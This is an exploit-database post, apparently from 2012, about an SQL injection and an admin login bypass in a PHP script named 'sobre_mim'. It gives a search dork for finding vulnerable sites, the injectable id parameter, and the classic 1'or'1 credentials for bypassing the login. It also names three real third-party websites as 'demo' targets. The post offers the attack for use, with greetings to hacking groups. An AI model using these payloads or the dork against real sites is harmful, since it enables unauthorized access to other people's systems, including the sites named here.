id: 17829
date: 03/25/2012
title: sobre_mim script Bypass / Sql Injection Vulnerability
author: MaNoor
cves: 

Exploit :  bypass / Sql Injection
 
# Date    :  24-03-2012
 
# Author  :  MaNoor
 
# Version :  n/a
 
# DorK    :  inurl:"sobre_mim.php?id="
 
# Email   :  MaNoor@HoTmaiL.CoM

# Greetz  :  Inj3ct0r Exploit DataBase 1337day.com   

#################################################################
 Discovered By:
 ||| MaNoor |||

[+] Exploit
 
  SQL  

[-] http://localhost/sobre_mim.php?id=[ SQL ]


  bypass

[-] http://localhost/admin

user: 1'or'1
pass: 1'or'1

[-] demo

http://cybelecorretora.com/admin

http://www.moveisocasiao.com/admin

http://www.homeimoveis.com.br/Imobiliaria/admin/
 
#################################################################

Great  : Tariq SQL  - TMT REKOoOo - stexhacker - lonley22

alex a7med - dr.jihad ..
         
back2hack.net  - a0a0a.net  - arhack.net  - ar-devloper.com



#  0day.today [2023-03-26]  #